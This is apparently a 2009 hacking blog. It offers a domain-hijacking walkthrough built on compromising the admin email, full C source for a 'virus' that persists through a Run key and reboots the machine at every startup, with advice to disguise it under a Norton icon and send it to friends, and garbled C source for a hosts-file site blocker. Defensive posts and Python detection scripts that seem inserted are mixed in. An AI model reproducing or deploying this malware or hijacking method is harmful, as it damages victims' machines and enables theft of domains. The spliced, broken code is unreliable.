Thursday, August 20, 2009

Domain Hijacking – How to Hijack a Domain

In this post I will tell you how domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as domain hijacking. For most of you, the term “domain hijacking” may seem alien, so let me first tell you what domain hijacking is all about.

Domain hijacking is a process by which Internet domain names are stolen from their legitimate owners. Domain hijacking is also known as domain theft. Before we look at how domain names are hijacked, it is necessary to understand how domain names operate and how they get associated with a particular web server (website).

The operation of a domain name is as follows

Any website, for example gohacking.com, consists of two parts: the domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts, and hence they must be integrated before a website can operate successfully. The integration of the domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel wherein we have full control of the domain.

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to a web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain.

This information can be obtained from the WHOIS data of the target domain. To access the WHOIS data, go to whois.domaintools.com, enter the target domain name and click on Lookup. Once the WHOIS data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record: “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. If you don’t find this, scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.

Once the hacker takes full control of this email account, he will visit the domain registrar’s website and click on forgot password on the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done, all the details to reset the password will be sent to the administrative email address. Since the hacker has access to this email account, he can easily reset the password of the domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you lose this email account, you lose your domain. So refer to my previous post on how to protect your email account from being hacked.

Another good way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for your domain name, he will not be able to find your name, phone and administrative email address. Private registration thus provides extra security and protects your privacy. It costs a bit extra but is well worth it for its advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.
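A domain owner can notice the change described above (the domain pointed at another server, or the administrative email replaced) by comparing the current WHOIS record with a saved baseline. The following is an added example, not code from the original post; the WHOIS label aliases, the hint texts and both sample records are constructed assumptions, since label names differ between registries.

```python
import re

# Label aliases are assumptions covering a common WHOIS layout; extend per registry.
FIELD_ALIASES = {
    "registrar": ("registrar", "registration service provided by"),
    "admin_email": ("admin email", "administrative contact email"),
    "name_servers": ("name server", "nserver"),
}

# What a change in each field means for the owner (wording is this example's own).
HINTS = {
    "registrar": "domain was moved to a different registrar",
    "admin_email": "password resets now go to a different mailbox",
    "name_servers": "domain may now resolve to a different web server",
}


def parse_whois(text):
    """Collect the monitored fields of a WHOIS record as lower-cased sets."""
    record = {field: set() for field in FIELD_ALIASES}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if not sep or not value.strip():
            continue
        label = re.sub(r"\s+", " ", label.strip().lower())
        for field, aliases in FIELD_ALIASES.items():
            if label in aliases:
                # Host names and mail addresses are case-insensitive here.
                record[field].add(value.strip().lower().rstrip("."))
    return record


def diff_against_baseline(baseline_text, current_text):
    """Return (field, removed, added, hint) for every monitored field that changed."""
    old, new = parse_whois(baseline_text), parse_whois(current_text)
    changes = []
    for field in FIELD_ALIASES:
        if old[field] != new[field]:
            removed = sorted(old[field] - new[field])
            added = sorted(new[field] - old[field])
            changes.append((field, removed, added, HINTS[field]))
    return changes


# Constructed sample records: John's domain at registrar X, hosted at Y, then moved to Z.
BASELINE = """\
Domain Name: ABC.EXAMPLE
Registrar: X Registrar (constructed)
Registrar URL: http://registrar-x.example
Admin Email: john@mail.example
Name Server: NS1.Y-HOSTING.EXAMPLE
Name Server: NS2.Y-HOSTING.EXAMPLE
"""

CURRENT = """\
Domain Name: ABC.EXAMPLE
Registrar: X Registrar (constructed)
Registrar URL: http://registrar-x.example
Admin Email: owner@other.example
Name Server: ns1.z-hosting.example
Name Server: ns2.z-hosting.example
"""

if __name__ == "__main__":
    for field, removed, added, hint in diff_against_baseline(BASELINE, CURRENT):
        print(f"{field}: {removed} -> {added} ({hint})")
```

With private registration the admin email shown is the privacy service's address, so a change in that field is still worth an alert.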

A Virus Program to Restart the Computer at Every Startup



Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus needs to be double-clicked only once, and from then onwards it will carry out the rest of the operations. And one more thing: none of the antivirus software detects this as a virus, since I have coded this virus in C. So if you are familiar with the C language, it’s easy to understand the logic behind the code.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}


Compiling The Source Code Into Executable Virus.

1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From then on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in SAFE MODE.
2. Go to X:\Windows\System (X can be C, D, E or F).
3. You will find a file by the name sysres.exe; delete it.
4. Type regedit in Run. This opens the registry editor. Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

There, on the right side, you will see an entry by the name “sres”. Delete this entry. That’s it. You have removed this virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic (algorithm) behind the working of the virus, this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not, it will just place a copy of itself into X:\Windows\System and make a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double-click the Sysres.exe file. The restarting process will occur from the next boot of the system.
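The persistence described in the logic above (a copy in X:\Windows\System plus a value under the per-user Run key) can be checked for from saved `reg query` output. This is an added detection example, not part of the original post; the sample output is constructed, and flagging any Run entry that starts from the legacy `\Windows\System` directory is this example's own heuristic.

```python
import ntpath
import re

# One value line of `reg query` output: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
# X:\Windows\System only (the legacy directory), not System32.
LEGACY_SYSTEM_DIR = re.compile(r"^[a-z]:\\windows\\system$", re.IGNORECASE)
# Names taken from the post: the Run value and the dropped file.
PAGE_VALUE_NAME = "sres"
PAGE_FILE_NAME = "sysres.exe"


def parse_reg_query(text):
    """Return (name, type, data) for every value line in `reg query` output."""
    entries = []
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"].strip()))
    return entries


def command_target(data):
    """Extract the executable path from a Run command line, quoted or not."""
    data = data.strip()
    if not data:
        return ""
    if data.startswith('"'):
        end = data.find('"', 1)
        path = data[1:end] if end != -1 else data[1:]
    else:
        m = re.match(r"(.+?\.(?:exe|com|bat|cmd|scr|pif))(?:\s|$)", data, re.IGNORECASE)
        path = m.group(1) if m else data.split()[0]
    return ntpath.normpath(path)


def audit_run_key(text):
    """Return (value name, target path, reasons) for entries that need review."""
    findings = []
    for name, _type, data in parse_reg_query(text):
        target = command_target(data)
        reasons = []
        if name.lower() == PAGE_VALUE_NAME or ntpath.basename(target).lower() == PAGE_FILE_NAME:
            reasons.append("value or file name matches the one used in the post")
        if LEGACY_SYSTEM_DIR.match(ntpath.dirname(target)):
            reasons.append("per-user autostart runs from the Windows\\System directory")
        if reasons:
            findings.append((name, target, reasons))
    return findings


# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
SAMPLE = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Chat Client    REG_SZ    "C:\Program Files\Chat Client\chat.exe" /minimized
    sres    REG_SZ    C:\windows\system\sysres.exe
    updater    REG_SZ    D:\WINDOWS\System\svc32.exe -q
'''

if __name__ == "__main__":
    for name, target, reasons in audit_run_key(SAMPLE):
        print(f"{name}: {target}: {'; '.join(reasons)}")
```

The second flagged entry shows why the directory check is there: a renamed copy no longer matches the names from the post but still starts from the same location.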

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into the Norton antivirus ICON itself so that people seeing this file believe that it is Norton antivirus. Or you can change its ICON into the ICON of any popular and trusted program so that people will definitely click on it.

Hack Protect your Orkut Account




This post is meant for providing some safety measures to prevent your Orkut account from being hacked. There is not much you have to take care of. Just follow the simple steps and never get your orkut account hacked in your life.

1. Never try to login/access your Orkut account from sites other than Orkut.com.

2. Never click on any links from sources you don’t trust while accessing your Orkut account (or while accessing any other Google services like Gmail, Blogger etc.).

3. Delete any links on your scrapbook, no matter if a known or unknown person has sent them.

4. Never disclose your orkut login details with anyone.

5. Never ever use Javascripts on Orkut, no matter whatever it claims to do. Get satisfied with the services provided by default! Avoid using third party Scripts which might be malicious.

6. Never get excited to see a site claiming to have 1000 cool orkut tricks for which you have to just log in to your orkut account. Don’t trust that site. That’s a Phishing site.

7. Never tick the box “REMEMBER ME” on the orkut homepage if you are surfing from a cafe or a public area.

8. Always remember to hit Sign out button, when you are done.

Friday, August 14, 2009

What is "Google"?




Google is a play on the word googol, which was coined by Milton Sirotta, nephew of American mathematician Edward Kasner, and was popularized in the book, "Mathematics and the Imagination" by Kasner and James Newman. It refers to the number represented by the numeral 1 followed by 100 zeros. Google's use of the term reflects the company's mission to organize the immense, seemingly infinite amount of information available on the web.

Originally called "Backrub", the logic behind the Google search engine was developed by graduate students Larry Page and Sergey Brin at Stanford University in 1995. Their first place of business was literally a garage. The garage location was chosen because it had a washer/dryer and a hot tub out back, they were already serving 10,000 searches a day.

try this link--
http://www.google.com/corporate/history.html

So How Does Google Work?
* Crawls and indexes web pages et al.
* Stores copies of web pages and graphics on their caching servers
* Presents users with simple front end to query the database of cached pages
* Returns search results in a ordered fashion based upon relevancy

Anatomy of a Search
http://computer.howstuffworks.com/search-engine1.htm
1] Server Side
2] Client Side

What Can Google Search?
* Adobe Portable Document Format (pdf)
* Adobe PostScript (ps)
* Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
* Lotus WordPro (lwp)
* MacWrite (mw)
* Microsoft Excel (xls)
* Microsoft PowerPoint (ppt)
* Microsoft Word (doc)
* Microsoft Works (wks, wps, wdb)
* Microsoft Write (wri)
* Rich Text Format (rtf)
* Shockwave Flash (swf)
* Text (ans, txt)

So What Determines Page Relevance and Rating?
* Exact Phrase: are your keywords found as an exact phrase in any pages?
* Adjacency: how close are your keywords to each other?
* Weighting: how many times do the keywords appear in the page?
* PageRank/Links: How many links point to the page? How many links are actually in the page?

Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links)

How Do I Get Results?
* Pick your keywords carefully & be specific
* Do NOT exceed 10 keywords
* Use Boolean modifiers
* Use advanced operators
* Google ignores some words:

a, about, an, and, are, as, at, be, by, from, how, i, in, is, it, of,

on, or, that, the, this, to, we, what, when, where, which, with

Google's Boolean Modifiers
* AND is always implied.
* OR: Escobar (Narcotics OR Cocaine)
* "-" = NOT: Escobar -Pablo
* "+" = MUST: Escobar +Roberto
* Use quotes for exact phrase matching: "nobody puts baby in a corner"

OR

"there are known knowns; there are things we know we know. We also know there are known unknowns; that is to say we know there are some things we do not know. But there are also unknown unknowns, the ones we don't know we don't know."

Saturday, August 8, 2009

Firewalls for Dummies


A firewall is a system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in hardware, in software, or in a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets.




Hide IP address-Real way to hide your IP address





Here in this post I will try to give you every possible piece of information on hiding the IP address. If you seriously want to hide your IP address then this post is for you!

One of the questions most frequently asked by Internet users is “How to hide the IP address?” Many times it becomes necessary to hide the real IP address for the sake of privacy. For this, I have tried many programs, proxy servers and other such tools that guaranteed to hide my IP address. But still none of them worked for me. I think most of you have had the same experience. Are you fed up with these dummy programs that fail to hide the real IP address? Then is there any working way to hide the IP address?

YES, you can definitely hide your IP.

Now I’ll come to the heart of the post, which contains the answer to your question of how to hide the IP address. The only solution to hide your IP address is to use a proxy server. But wait! The story doesn’t end here. Even though proxy servers are the only way to hide your IP address, there are several ways of connecting your PC to the proxy server. Before setting up the connection with a proxy server you must know something about the different types of proxy servers and their uses.

1. Transparent Proxy Server
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the HTTP headers. These are generally used to speed up web browsing since they have a very good ability to cache websites. But they do not conceal the IP of their users. It is widely known as a transparent proxy because it will expose your real IP address to the web. This type of proxy server does not hide your IP address.

2. Anonymous Proxy Server
This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.

3. Distorting Proxy Server
This type of proxy server identifies itself as a proxy server, but makes an incorrect original IP address available through the HTTP headers. This type of proxy server will hide your IP address.

4. High Anonymity Proxy Server ( Elite Proxy)
This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address. So this is the best way to mask your IP.
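The four types above differ only in what the destination web server sees in the request headers, so a test page that you control can tell you which kind of proxy you are behind. The following is an added example, not from the original post: `Via`, `X-Forwarded-For` and `Forwarded` are standard proxy headers, while the header list, the `classify` function and the sample requests (documentation-range addresses) are assumptions constructed for illustration.

```python
import ipaddress
import re

# Headers whose presence announces a proxy (assumed list; proxies may add others).
PROXY_HEADERS = ("via", "x-forwarded-for", "forwarded", "x-real-ip", "proxy-connection")


def _to_ip(token):
    """Parse 1.2.3.4, 1.2.3.4:8080 or "[2001:db8::1]:80"; return None if not an IP."""
    token = token.strip().strip('"')
    if token.startswith("["):
        token = token[1:].split("]", 1)[0]
    elif token.count(":") == 1:          # IPv4 with a port
        token = token.split(":", 1)[0]
    try:
        return ipaddress.ip_address(token)
    except ValueError:
        return None                      # e.g. "unknown" or an obfuscated identifier


def disclosed_addresses(headers):
    """Every client address the proxy passed on in the request headers."""
    h = {k.lower(): v for k, v in headers.items()}
    tokens = h.get("x-forwarded-for", "").split(",")
    tokens += h.get("x-real-ip", "").split(",")
    tokens += re.findall(r'(?i)\bfor=("[^"]*"|[^;,\s]+)', h.get("forwarded", ""))
    return {ip for ip in map(_to_ip, tokens) if ip is not None}


def classify(headers, peer_ip, real_ip):
    """Classify a request as seen by the server, given the tester's known real IP."""
    real, peer = ipaddress.ip_address(real_ip), ipaddress.ip_address(peer_ip)
    announced = any(k.lower() in PROXY_HEADERS for k in headers)
    disclosed = disclosed_addresses(headers)
    if real in disclosed:
        return "transparent"             # real address is in the headers
    if announced and disclosed:
        return "distorting"              # some other address is presented as the client
    if announced:
        return "anonymous"               # admits to being a proxy, discloses nothing
    return "direct" if peer == real else "elite"


# Constructed sample requests: (headers, address the connection came from).
REAL_IP, PROXY_IP = "198.51.100.23", "203.0.113.9"
SAMPLES = {
    "transparent": ({"Via": "1.1 cache.example",
                     "X-Forwarded-For": "198.51.100.23, 203.0.113.9"}, PROXY_IP),
    "anonymous": ({"Via": "1.1 cache.example"}, PROXY_IP),
    "distorting": ({"Via": "1.1 cache.example",
                    "Forwarded": 'for="[2001:db8::1]:4711";proto=http'}, PROXY_IP),
    "elite": ({"User-Agent": "test"}, PROXY_IP),
    "direct": ({"User-Agent": "test"}, REAL_IP),
}

if __name__ == "__main__":
    for expected, (headers, peer) in SAMPLES.items():
        print(expected, "->", classify(headers, peer, REAL_IP))
```

An "elite" verdict only means the headers are clean; it says nothing about other ways a proxy can be detected.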

Which Proxy Server is the best to Hide My IP ?

I know, you can answer this question better than me. Obviously a High Anonymity Proxy or Elite Proxy is the best to hide your IP. But it’s not easy to get a list of working elite proxies. If you search Google, you will definitely get tons of proxy lists. You’ll get a list of proxies in the following format

IP:Port Number
Eg: 221.90.45.67:8080 (221.90.45.67 is the IP of the proxy server and 8080 is the port number)
But most of them don’t work. Here are some of the problems/risks associated with using free proxies that are available on the Internet.

* Most of them do not work since the proxy servers frequently change their IP/port number.
* Even if you find a working proxy server it may be too slow.
* Your privacy is not guaranteed since all your traffic is routed through the proxy server.
* The administrators of the proxy servers may steal your valuable information such as passwords, SSN (Social Security number), credit card details etc.

So with all these being the risks, how do you find working, fast, highly anonymous and secure proxy servers?

Now I will give a list of programs that will really hide your IP address. I have tried many such programs and have found only a few of them working perfectly. Here is a list of working IP hiding programs that you can try. I have listed them in the order of their popularity.

1. Hide The IP

Lets you choose the country, type and speed of the proxy. Not so popular, but personally I recommend this to users.

2. Hide My IP

3. Hide IP NG

You can get more information about these products on their respective homepages.

How to ensure that the IP is hidden ?

Before you hide your IP you can check your real IP by visiting the following site.

WhatIsMyIPAddress.Com

Once you get your real IP, switch on your IP hiding software. Now once again visit the above site and check your IP address. If you see a new IP then this means that your software is doing the right job. Also, the above site (Whatismyipaddress.com) is capable of detecting many proxies. If you see words such as “Suspected proxy server or network sharing device” or similar, it means that the proxy you are using is not an Elite Proxy.

One final word before you leave! Even though Elite proxies are almost undetectable, this doesn’t mean that you can escape from online crimes by hiding your IP. There are many proxy detecting services available which detect almost any proxy. So if you are involved in any cyber crime, you will definitely end up behind bars. Using a proxy will not help you in this case.

One more thing: it is unsafe to use a proxy during e-commerce transactions such as online banking, online credit card payment etc. So please avoid proxies in these circumstances.

A Virus Program to Block Websites


Most of us are familiar with the virus that used to block the Orkut and Youtube sites. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus needs to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that have been specified in the source code. The victim will never be able to surf those websites unless he re-installs the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any browser program.
Here is the source code of the virus.
#include#include#include
char site_list[6][30]={“google.com”,“www.google.com”,“youtube.com”,“www.youtube.com”,“yahoo.com”,“www.yahoo.com”};char ip[12]=”127.0.0.1″;FILE *target;
int find_root(void);void block_site(void);
int find_root(){int done;struct ffblk ffblk;//File block structure
done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
else return 0;}
void block_site(){int i;fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);for(i=0;i<6;i++) success="0;success="find_root();if(success)block_site();}" href="http://blogsplane.blogspot.com/2009/07/how-to-compile-c-programs.html" target="_blank">How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that are listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then type the URL of a blocked site and you’ll see the browser showing the error “Page cannot displayed”.
3. To remove the virus, type the following in Run: %windir%\system32\drivers\etc
4. There, open the file named “hosts” using Notepad. At the bottom of the opened file you’ll see something like this
127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.
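The manual check in steps 3 to 5 can be automated: read the hosts file, flag every name other than the usual localhost aliases that is mapped to a loopback or unspecified address, and produce a cleaned copy. This is an added example, not part of the original post; the allow-list of loopback names and the sample file content are constructed assumptions, and deliberate ad-blocking entries will also be flagged, so review findings before deleting.

```python
import ipaddress

# Names that normally map to loopback (assumed allow-list; extend for your systems).
LOOPBACK_OK = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Yield (line_no, ip, names) for each mapping line; comments and blanks are skipped."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                      # malformed line, not a mapping
        yield line_no, ip, [name.lower() for name in fields[1:]]


def audit_hosts(text):
    """Return (line_no, ip, name) for every non-local name pointed at the local machine."""
    findings = []
    for line_no, ip, names in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            for name in names:
                if name not in LOOPBACK_OK:
                    findings.append((line_no, str(ip), name))
    return findings


def clean_hosts(text):
    """Return the file content with flagged names removed; emptied lines are dropped."""
    flagged = {}
    for line_no, _ip, name in audit_hosts(text):
        flagged.setdefault(line_no, set()).add(name)
    out = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        if line_no not in flagged:
            out.append(raw)
            continue
        body, sep, comment = raw.partition("#")
        fields = body.split()
        keep = [f for f in fields[1:] if f.lower() not in flagged[line_no]]
        if keep:
            line = " ".join([fields[0]] + keep)
            out.append(line + ("  #" + comment if sep else ""))
    return "\n".join(out) + "\n"


# Constructed sample: a normal hosts file with blocking entries appended at the end.
SAMPLE = (
    "# Constructed sample hosts file\n"
    "127.0.0.1       localhost\n"
    "::1             localhost\n"
    "10.0.0.5        intranet.example\n"
    "\n"
    "127.0.0.1\tgoogle.com\n"
    "127.0.0.1\twww.google.com\n"
    "127.0.0.1 youtube.com www.youtube.com localhost\n"
)

if __name__ == "__main__":
    for line_no, ip, name in audit_hosts(SAMPLE):
        print(f"line {line_no}: {name} -> {ip}")
    print(clean_hosts(SAMPLE), end="")
```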